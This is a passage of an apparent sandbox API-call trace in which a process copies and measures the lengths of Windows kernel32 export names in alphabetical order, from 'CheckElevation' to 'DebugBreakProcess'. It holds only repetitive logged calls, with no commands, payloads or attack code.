(lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.134] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.134] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.134] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.134] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.134] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.134] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.134] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.134] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.134] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.134] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.134] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.134] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.134] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.134] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.134] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.134] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.135] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.135] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.135] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.135] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.135] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.135] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.135] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.135] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.135] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.135] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.135] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.135] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.135] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.136] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.136] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.136] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.136] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.136] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.136] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.136] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.136] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.136] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.136] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.136] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.136] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.136] lstrlenA (lpString="COPYFILEA") returned 9 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.136] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.136] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.136] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.136] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.136] lstrlenA (lpString="COPYFILEW") returned 9 [0079.136] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.137] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.137] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.137] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.137] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.137] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.137] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.137] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.137] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.137] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.137] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.137] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.137] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.137] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.137] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.137] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.137] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.137] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.137] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.137] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.137] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.138] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.138] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.138] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.138] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.138] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.138] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.138] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.138] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.138] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.138] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.138] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.138] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.138] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.138] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.138] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.138] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.138] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.138] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.138] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.139] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.139] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.139] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.139] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.139] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.139] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.139] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.139] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.139] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.139] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.139] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.139] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.139] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.139] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.139] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.139] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.139] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.139] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.139] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.139] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.140] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.140] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.140] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.140] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.140] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.140] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.140] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.140] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.140] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.140] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.140] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.140] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.140] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.140] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.140] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.140] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.140] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.140] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.140] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.141] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.141] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.141] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.141] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.141] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.141] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.141] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.141] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.141] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: 